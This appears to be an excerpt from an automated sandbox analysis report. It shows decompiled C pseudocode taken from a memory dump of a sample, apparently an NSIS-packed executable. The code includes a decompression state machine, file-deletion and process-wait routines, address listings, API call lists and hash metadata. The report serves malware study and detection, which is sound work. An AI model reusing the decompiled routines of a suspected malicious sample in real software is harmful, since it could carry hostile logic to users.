                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                      													__ecx =  *(__ebp - 0x10);
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      													__ebx = __ebx | 0x00000001;
                                      													__eflags = __ebx;
                                      													 *(__ebp - 0x44) = __ebx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													L101:
                                      													_t338 = __ebp - 0x48;
                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                      													__eflags =  *_t338;
                                      													goto L102;
                                      												} else {
                                      													goto L99;
                                      												}
                                      											}
                                      											__edx =  *(__ebp - 4);
                                      											__eax = __eax - __ebx;
                                      											 *(__ebp - 0x40) = __ecx;
                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                      											goto L108;
                                      										case 0x1a:
                                      											L56:
                                      											__eflags =  *(__ebp - 0x64);
                                      											if( *(__ebp - 0x64) == 0) {
                                      												 *(__ebp - 0x88) = 0x1a;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x68);
                                      											__al =  *(__ebp - 0x5c);
                                      											__edx =  *(__ebp - 8);
                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      											 *( *(__ebp - 0x68)) = __al;
                                      											__ecx =  *(__ebp - 0x14);
                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                      											__eax = __ecx + 1;
                                      											__edx = 0;
                                      											_t192 = __eax %  *(__ebp - 0x74);
                                      											__eax = __eax /  *(__ebp - 0x74);
                                      											__edx = _t192;
                                      											goto L79;
                                      										case 0x1b:
                                      											L75:
                                      											__eflags =  *(__ebp - 0x64);
                                      											if( *(__ebp - 0x64) == 0) {
                                      												 *(__ebp - 0x88) = 0x1b;
                                      												goto L170;
                                      											}
                                      											__eax =  *(__ebp - 0x14);
                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      											__eflags = __eax -  *(__ebp - 0x74);
                                      											if(__eax >=  *(__ebp - 0x74)) {
                                      												__eax = __eax +  *(__ebp - 0x74);
                                      												__eflags = __eax;
                                      											}
                                      											__edx =  *(__ebp - 8);
                                      											__cl =  *(__eax + __edx);
                                      											__eax =  *(__ebp - 0x14);
                                      											 *(__ebp - 0x5c) = __cl;
                                      											 *(__eax + __edx) = __cl;
                                      											__eax = __eax + 1;
                                      											__edx = 0;
                                      											_t274 = __eax %  *(__ebp - 0x74);
                                      											__eax = __eax /  *(__ebp - 0x74);
                                      											__edx = _t274;
                                      											__eax =  *(__ebp - 0x68);
                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      											_t283 = __ebp - 0x64;
                                      											 *_t283 =  *(__ebp - 0x64) - 1;
                                      											__eflags =  *_t283;
                                      											 *( *(__ebp - 0x68)) = __cl;
                                      											L79:
                                      											 *(__ebp - 0x14) = __edx;
                                      											goto L80;
                                      										case 0x1c:
                                      											while(1) {
                                      												L123:
                                      												__eflags =  *(__ebp - 0x64);
                                      												if( *(__ebp - 0x64) == 0) {
                                      													break;
                                      												}
                                      												__eax =  *(__ebp - 0x14);
                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      												__eflags = __eax -  *(__ebp - 0x74);
                                      												if(__eax >=  *(__ebp - 0x74)) {
                                      													__eax = __eax +  *(__ebp - 0x74);
                                      													__eflags = __eax;
                                      												}
                                      												__edx =  *(__ebp - 8);
                                      												__cl =  *(__eax + __edx);
                                      												__eax =  *(__ebp - 0x14);
                                      												 *(__ebp - 0x5c) = __cl;
                                      												 *(__eax + __edx) = __cl;
                                      												__eax = __eax + 1;
                                      												__edx = 0;
                                      												_t414 = __eax %  *(__ebp - 0x74);
                                      												__eax = __eax /  *(__ebp - 0x74);
                                      												__edx = _t414;
                                      												__eax =  *(__ebp - 0x68);
                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                      												__eflags =  *(__ebp - 0x30);
                                      												 *( *(__ebp - 0x68)) = __cl;
                                      												 *(__ebp - 0x14) = _t414;
                                      												if( *(__ebp - 0x30) > 0) {
                                      													continue;
                                      												} else {
                                      													L80:
                                      													 *(__ebp - 0x88) = 2;
                                      													goto L1;
                                      												}
                                      											}
                                      											 *(__ebp - 0x88) = 0x1c;
                                      											goto L170;
                                      									}
                                      								}
                                      								L171:
                                      								_t535 = _t534 | 0xffffffff;
                                      								goto L172;
                                      							}
                                      						}
                                      					}
                                      				}
                                      			}













                                      0x00000000
                                      0x00407068
                                      0x00407068
                                      0x0040706c
                                      0x00407095
                                      0x0040709f
                                      0x0040706e
                                      0x00407077
                                      0x00407084
                                      0x00407087
                                      0x004073cb
                                      0x004073cb
                                      0x004073ce
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x0040741c
                                      0x00407420
                                      0x004075cf
                                      0x004075e5
                                      0x004075ed
                                      0x004075f4
                                      0x004075f6
                                      0x004075fd
                                      0x00407601
                                      0x00407601
                                      0x0040742c
                                      0x00407433
                                      0x0040743b
                                      0x0040743e
                                      0x00407441
                                      0x00407441
                                      0x00407447
                                      0x00407447
                                      0x00406be3
                                      0x00406be3
                                      0x00406be3
                                      0x00406bec
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x00000000
                                      0x00406bfd
                                      0x00000000
                                      0x00000000
                                      0x00406c06
                                      0x00406c09
                                      0x00406c0c
                                      0x00406c10
                                      0x00000000
                                      0x00000000
                                      0x00406c16
                                      0x00406c19
                                      0x00406c1b
                                      0x00406c1c
                                      0x00406c1f
                                      0x00406c21
                                      0x00406c22
                                      0x00406c24
                                      0x00406c27
                                      0x00406c2c
                                      0x00406c31
                                      0x00406c3a
                                      0x00406c4d
                                      0x00406c50
                                      0x00406c5c
                                      0x00406c84
                                      0x00406c86
                                      0x00406c94
                                      0x00406c94
                                      0x00406c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406c88
                                      0x00406c88
                                      0x00406c8b
                                      0x00406c8c
                                      0x00406c8c
                                      0x00000000
                                      0x00406c88
                                      0x00406c62
                                      0x00406c67
                                      0x00406c67
                                      0x00406c70
                                      0x00406c78
                                      0x00406c7b
                                      0x00000000
                                      0x00406c81
                                      0x00406c81
                                      0x00000000
                                      0x00406c81
                                      0x00000000
                                      0x00406c9e
                                      0x00406c9e
                                      0x00406ca2
                                      0x0040754e
                                      0x00000000
                                      0x0040754e
                                      0x00406cab
                                      0x00406cbb
                                      0x00406cbe
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc4
                                      0x00406cc8
                                      0x00000000
                                      0x00000000
                                      0x00406cca
                                      0x00406cd0
                                      0x00406cfa
                                      0x00406d00
                                      0x00406d07
                                      0x00000000
                                      0x00406d07
                                      0x00406cd6
                                      0x00406cd9
                                      0x00406cde
                                      0x00406cde
                                      0x00406ce9
                                      0x00406cf1
                                      0x00406cf4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d39
                                      0x00406d3f
                                      0x00406d42
                                      0x00406d4f
                                      0x00406d57
                                      0x004073cb
                                      0x00000000
                                      0x00000000
                                      0x00406d0e
                                      0x00406d0e
                                      0x00406d12
                                      0x0040755d
                                      0x00000000
                                      0x0040755d
                                      0x00406d1e
                                      0x00406d29
                                      0x00406d29
                                      0x00406d29
                                      0x00406d2c
                                      0x00406d2f
                                      0x00406d32
                                      0x00406d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d5f
                                      0x00406d61
                                      0x00406d64
                                      0x00406dd5
                                      0x00406dd8
                                      0x00406ddb
                                      0x00406de2
                                      0x00406dec
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x004073cb
                                      0x00406d66
                                      0x00406d6a
                                      0x00406d6d
                                      0x00406d6f
                                      0x00406d72
                                      0x00406d75
                                      0x00406d77
                                      0x00406d7a
                                      0x00406d7c
                                      0x00406d81
                                      0x00406d84
                                      0x00406d87
                                      0x00406d8b
                                      0x00406d92
                                      0x00406d95
                                      0x00406d9c
                                      0x00406da0
                                      0x00406da8
                                      0x00406da8
                                      0x00406da8
                                      0x00406da2
                                      0x00406da2
                                      0x00406da2
                                      0x00406d97
                                      0x00406d97
                                      0x00406d97
                                      0x00406dac
                                      0x00406daf
                                      0x00406dcd
                                      0x00406dcf
                                      0x00000000
                                      0x00406db1
                                      0x00406db1
                                      0x00406db4
                                      0x00406db7
                                      0x00406dba
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbf
                                      0x00406dc2
                                      0x00406dc4
                                      0x00406dc5
                                      0x00406dc8
                                      0x00000000
                                      0x00406dc8
                                      0x00000000
                                      0x00406ffe
                                      0x00407002
                                      0x00407020
                                      0x00407023
                                      0x0040702a
                                      0x0040702d
                                      0x00407030
                                      0x00407033
                                      0x00407036
                                      0x00407039
                                      0x0040703b
                                      0x00407042
                                      0x00407043
                                      0x00407045
                                      0x00407048
                                      0x0040704b
                                      0x0040704e
                                      0x0040704e
                                      0x00407053
                                      0x00000000
                                      0x00407053
                                      0x00407004
                                      0x00407007
                                      0x0040700a
                                      0x00407014
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004070ab
                                      0x004070af
                                      0x00000000
                                      0x00000000
                                      0x004070b5
                                      0x004070b9
                                      0x00000000
                                      0x00000000
                                      0x004070bf
                                      0x004070c1
                                      0x004070c5
                                      0x004070c5
                                      0x004070c8
                                      0x004070cc
                                      0x00000000
                                      0x00000000
                                      0x0040711c
                                      0x00407120
                                      0x00407127
                                      0x0040712a
                                      0x0040712d
                                      0x00407137
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x004073cb
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407143
                                      0x00407147
                                      0x0040714e
                                      0x00407151
                                      0x00407154
                                      0x00407149
                                      0x00407149
                                      0x00407149
                                      0x00407157
                                      0x0040715a
                                      0x0040715d
                                      0x0040715d
                                      0x00407160
                                      0x00407163
                                      0x00407166
                                      0x00407166
                                      0x00407169
                                      0x00407170
                                      0x00407175
                                      0x00000000
                                      0x00000000
                                      0x00407203
                                      0x00407203
                                      0x00407207
                                      0x004075a5
                                      0x00000000
                                      0x004075a5
                                      0x0040720d
                                      0x00407210
                                      0x00407213
                                      0x00407217
                                      0x0040721a
                                      0x00407220
                                      0x00407222
                                      0x00407222
                                      0x00407222
                                      0x00407225
                                      0x00407228
                                      0x00000000
                                      0x00000000
                                      0x00406df8
                                      0x00406df8
                                      0x00406dfc
                                      0x00407569
                                      0x00000000
                                      0x00407569
                                      0x00406e02
                                      0x00406e05
                                      0x00406e08
                                      0x00406e0c
                                      0x00406e0f
                                      0x00406e15
                                      0x00406e17
                                      0x00406e17
                                      0x00406e17
                                      0x00406e1a
                                      0x00406e1d
                                      0x00406e1d
                                      0x00406e20
                                      0x00406e23
                                      0x00000000
                                      0x00000000
                                      0x00406e29
                                      0x00406e2f
                                      0x00000000
                                      0x00000000
                                      0x00406e35
                                      0x00406e35
                                      0x00406e39
                                      0x00406e3c
                                      0x00406e3f
                                      0x00406e42
                                      0x00406e45
                                      0x00406e46
                                      0x00406e49
                                      0x00406e4b
                                      0x00406e51
                                      0x00406e54
                                      0x00406e57
                                      0x00406e5a
                                      0x00406e5d
                                      0x00406e60
                                      0x00406e63
                                      0x00406e7f
                                      0x00406e82
                                      0x00406e85
                                      0x00406e88
                                      0x00406e8f
                                      0x00406e93
                                      0x00406e95
                                      0x00406e99
                                      0x00406e65
                                      0x00406e65
                                      0x00406e69
                                      0x00406e71
                                      0x00406e76
                                      0x00406e78
                                      0x00406e7a
                                      0x00406e7a
                                      0x00406e9c
                                      0x00406ea3
                                      0x00406ea6
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eb1
                                      0x00406eb1
                                      0x00406eb5
                                      0x00407575
                                      0x00000000
                                      0x00407575
                                      0x00406ebb
                                      0x00406ebe
                                      0x00406ec1
                                      0x00406ec5
                                      0x00406ec8
                                      0x00406ece
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed3
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00406ede
                                      0x00406ee1
                                      0x00406ee4
                                      0x00406ee7
                                      0x00406eea
                                      0x00406eed
                                      0x00406ef0
                                      0x00406ef3
                                      0x00406ef6
                                      0x00406ef9
                                      0x00406efc
                                      0x00406f14
                                      0x00406f17
                                      0x00406f1a
                                      0x00406f1d
                                      0x00406f1d
                                      0x00406f20
                                      0x00406f24
                                      0x00406f26
                                      0x00406efe
                                      0x00406efe
                                      0x00406f06
                                      0x00406f0b
                                      0x00406f0d
                                      0x00406f0f
                                      0x00406f0f
                                      0x00406f29
                                      0x00406f30
                                      0x00406f33
                                      0x00000000
                                      0x00406f35
                                      0x00000000
                                      0x00406f35
                                      0x00406f33
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00000000
                                      0x00000000
                                      0x00406f75
                                      0x00406f75
                                      0x00406f79
                                      0x00407581
                                      0x00000000
                                      0x00407581
                                      0x00406f7f
                                      0x00406f82
                                      0x00406f85
                                      0x00406f89
                                      0x00406f8c
                                      0x00406f92
                                      0x00406f94
                                      0x00406f94
                                      0x00406f94
                                      0x00406f97
                                      0x00406f9a
                                      0x00406f9a
                                      0x00406fa0
                                      0x00406f3e
                                      0x00406f3e
                                      0x00406f41
                                      0x00000000
                                      0x00406f41
                                      0x00406fa2
                                      0x00406fa2
                                      0x00406fa5
                                      0x00406fa8
                                      0x00406fab
                                      0x00406fae
                                      0x00406fb1
                                      0x00406fb4
                                      0x00406fb7
                                      0x00406fba
                                      0x00406fbd
                                      0x00406fc0
                                      0x00406fd8
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fe1
                                      0x00406fe1
                                      0x00406fe4
                                      0x00406fe8
                                      0x00406fea
                                      0x00406fc2
                                      0x00406fc2
                                      0x00406fca
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd3
                                      0x00406fd3
                                      0x00406fed
                                      0x00406ff4
                                      0x00406ff7
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00407286
                                      0x00407286
                                      0x0040728a
                                      0x004075b1
                                      0x00000000
                                      0x004075b1
                                      0x00407290
                                      0x00407293
                                      0x00407296
                                      0x0040729a
                                      0x0040729d
                                      0x004072a3
                                      0x004072a5
                                      0x004072a5
                                      0x004072a5
                                      0x004072a8
                                      0x00000000
                                      0x00000000
                                      0x00407056
                                      0x00407056
                                      0x00407059
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x00000000
                                      0x00407395
                                      0x00407399
                                      0x004073bb
                                      0x004073be
                                      0x004073c8
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x004073cb
                                      0x0040739b
                                      0x0040739e
                                      0x004073a2
                                      0x004073a5
                                      0x004073a5
                                      0x004073a8
                                      0x00000000
                                      0x00000000
                                      0x00407452
                                      0x00407456
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x0040747b
                                      0x00407482
                                      0x00407489
                                      0x00407489
                                      0x00000000
                                      0x00407489
                                      0x00407458
                                      0x0040745b
                                      0x0040745e
                                      0x00407461
                                      0x00407468
                                      0x004073ac
                                      0x004073ac
                                      0x004073af
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00407546
                                      0x00407447
                                      0x00000000
                                      0x00000000
                                      0x0040717d
                                      0x0040717f
                                      0x00407186
                                      0x00407187
                                      0x00407189
                                      0x0040718c
                                      0x00000000
                                      0x00000000
                                      0x00407194
                                      0x00407197
                                      0x0040719a
                                      0x0040719c
                                      0x0040719e
                                      0x0040719e
                                      0x0040719f
                                      0x004071a2
                                      0x004071a9
                                      0x004071ac
                                      0x004071ba
                                      0x00000000
                                      0x00000000
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x00000000
                                      0x0040749f
                                      0x0040749f
                                      0x004074a3
                                      0x004075db
                                      0x00000000
                                      0x004075db
                                      0x004074a9
                                      0x004074ac
                                      0x004074af
                                      0x004074b3
                                      0x004074b6
                                      0x004074bc
                                      0x004074be
                                      0x004074be
                                      0x004074be
                                      0x004074c1
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c7
                                      0x004074c7
                                      0x004074cb
                                      0x0040752b
                                      0x0040752e
                                      0x00407533
                                      0x00407534
                                      0x00407536
                                      0x00407538
                                      0x0040753b
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x0040744d
                                      0x00407447
                                      0x004074cd
                                      0x004074d3
                                      0x004074d6
                                      0x004074d9
                                      0x004074dc
                                      0x004074df
                                      0x004074e2
                                      0x004074e5
                                      0x004074e8
                                      0x004074eb
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x0040750d
                                      0x00407510
                                      0x00407514
                                      0x00407516
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074f8
                                      0x004074fd
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x0040751d
                                      0x00407524
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x004071c2
                                      0x004071c5
                                      0x004071fb
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732e
                                      0x0040732e
                                      0x00407331
                                      0x00407333
                                      0x004075bd
                                      0x00000000
                                      0x004075bd
                                      0x00407339
                                      0x0040733c
                                      0x00000000
                                      0x00000000
                                      0x00407342
                                      0x00407346
                                      0x00407349
                                      0x00407349
                                      0x00407349
                                      0x00000000
                                      0x00407349
                                      0x004071c7
                                      0x004071c9
                                      0x004071cb
                                      0x004071cd
                                      0x004071d0
                                      0x004071d1
                                      0x004071d3
                                      0x004071d5
                                      0x004071d8
                                      0x004071db
                                      0x004071f1
                                      0x004071f6
                                      0x0040722e
                                      0x0040722e
                                      0x00407232
                                      0x0040725e
                                      0x00407260
                                      0x00407267
                                      0x0040726a
                                      0x0040726d
                                      0x0040726d
                                      0x00407272
                                      0x00407272
                                      0x00407274
                                      0x00407277
                                      0x0040727e
                                      0x00407281
                                      0x004072ae
                                      0x004072ae
                                      0x004072b1
                                      0x004072b4
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00000000
                                      0x00407328
                                      0x004072b6
                                      0x004072bc
                                      0x004072bf
                                      0x004072c2
                                      0x004072c5
                                      0x004072c8
                                      0x004072cb
                                      0x004072ce
                                      0x004072d1
                                      0x004072d4
                                      0x004072d7
                                      0x004072f0
                                      0x004072f2
                                      0x004072f5
                                      0x004072f6
                                      0x004072f9
                                      0x004072fb
                                      0x004072fe
                                      0x00407300
                                      0x00407302
                                      0x00407305
                                      0x00407307
                                      0x0040730a
                                      0x0040730e
                                      0x00407310
                                      0x00407310
                                      0x00407311
                                      0x00407314
                                      0x00407317
                                      0x004072d9
                                      0x004072d9
                                      0x004072e1
                                      0x004072e6
                                      0x004072e8
                                      0x004072eb
                                      0x004072eb
                                      0x0040731a
                                      0x00407321
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x00000000
                                      0x00407323
                                      0x00000000
                                      0x00407323
                                      0x00407321
                                      0x00407234
                                      0x00407237
                                      0x00407239
                                      0x0040723c
                                      0x0040723f
                                      0x00407242
                                      0x00407244
                                      0x00407247
                                      0x0040724a
                                      0x0040724a
                                      0x0040724d
                                      0x0040724d
                                      0x00407250
                                      0x00407257
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x00000000
                                      0x00407259
                                      0x00000000
                                      0x00407259
                                      0x00407257
                                      0x004071dd
                                      0x004071e0
                                      0x004071e2
                                      0x004071e5
                                      0x00000000
                                      0x00000000
                                      0x00406f44
                                      0x00406f44
                                      0x00406f48
                                      0x0040758d
                                      0x00000000
                                      0x0040758d
                                      0x00406f4e
                                      0x00406f51
                                      0x00406f54
                                      0x00406f57
                                      0x00406f5a
                                      0x00406f5d
                                      0x00406f60
                                      0x00406f62
                                      0x00406f65
                                      0x00406f68
                                      0x00406f6b
                                      0x00406f6d
                                      0x00406f6d
                                      0x00406f6d
                                      0x00000000
                                      0x00000000
                                      0x004070cf
                                      0x004070cf
                                      0x004070d3
                                      0x00407599
                                      0x00000000
                                      0x00407599
                                      0x004070d9
                                      0x004070dc
                                      0x004070df
                                      0x004070e2
                                      0x004070e4
                                      0x004070e4
                                      0x004070e4
                                      0x004070e7
                                      0x004070ea
                                      0x004070ed
                                      0x004070f0
                                      0x004070f3
                                      0x004070f6
                                      0x004070f7
                                      0x004070f9
                                      0x004070f9
                                      0x004070f9
                                      0x004070fc
                                      0x004070ff
                                      0x00407102
                                      0x00407105
                                      0x00407105
                                      0x00407105
                                      0x00407108
                                      0x0040710a
                                      0x0040710a
                                      0x00000000
                                      0x00000000
                                      0x0040734c
                                      0x0040734c
                                      0x0040734c
                                      0x00407350
                                      0x00000000
                                      0x00000000
                                      0x00407356
                                      0x00407359
                                      0x0040735c
                                      0x0040735f
                                      0x00407361
                                      0x00407361
                                      0x00407361
                                      0x00407364
                                      0x00407367
                                      0x0040736a
                                      0x0040736d
                                      0x00407370
                                      0x00407373
                                      0x00407374
                                      0x00407376
                                      0x00407376
                                      0x00407376
                                      0x00407379
                                      0x0040737c
                                      0x0040737f
                                      0x00407382
                                      0x00407385
                                      0x00407389
                                      0x0040738b
                                      0x0040738e
                                      0x00000000
                                      0x00407390
                                      0x0040710d
                                      0x0040710d
                                      0x00000000
                                      0x0040710d
                                      0x0040738e
                                      0x004075c3
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x004075fa
                                      0x004075fa
                                      0x00000000
                                      0x004075fa
                                      0x00407447
                                      0x004073ce
                                      0x004073cb

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                      • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                      • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                      • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 41%
                                      			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                      				int _t9;
                                      				long _t13;
                                      				WCHAR* _t14;
                                      
                                      				_t14 = _a4;
                                      				_t13 = E00406133(_t14);
                                      				if(_t13 == 0xffffffff) {
                                      					L8:
                                      					return 0;
                                      				}
                                      				_push(_t14);
                                      				if((_a8 & 0x00000001) == 0) {
                                      					_t9 = DeleteFileW();
                                      				} else {
                                      					_t9 = RemoveDirectoryW(); // executed
                                      				}
                                      				if(_t9 == 0) {
                                      					if((_a8 & 0x00000004) == 0) {
                                      						SetFileAttributesW(_t14, _t13);
                                      					}
                                      					goto L8;
                                      				} else {
                                      					return 1;
                                      				}
                                      			}






                                      0x00405d2d
                                      0x00405d38
                                      0x00405d3d
                                      0x00405d6d
                                      0x00000000
                                      0x00405d6d
                                      0x00405d44
                                      0x00405d45
                                      0x00405d4f
                                      0x00405d47
                                      0x00405d47
                                      0x00405d47
                                      0x00405d57
                                      0x00405d63
                                      0x00405d67
                                      0x00405d67
                                      0x00000000
                                      0x00405d59
                                      0x00000000
                                      0x00405d5b

                                      APIs
                                        • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                        • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                      • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                      • String ID:
                                      • API String ID: 1655745494-0
                                      • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                      • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                      • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                      • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406AE0(void* __ecx, void* _a4) {
                                      				long _v8;
                                      				long _t6;
                                      
                                      				_t6 = WaitForSingleObject(_a4, 0x64);
                                      				while(_t6 == 0x102) {
                                      					E00406A71(0xf);
                                      					_t6 = WaitForSingleObject(_a4, 0x64);
                                      				}
                                      				GetExitCodeProcess(_a4,  &_v8); // executed
                                      				return _v8;
                                      			}





                                      0x00406af1
                                      0x00406b08
                                      0x00406afc
                                      0x00406b06
                                      0x00406b06
                                      0x00406b13
                                      0x00406b1f

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
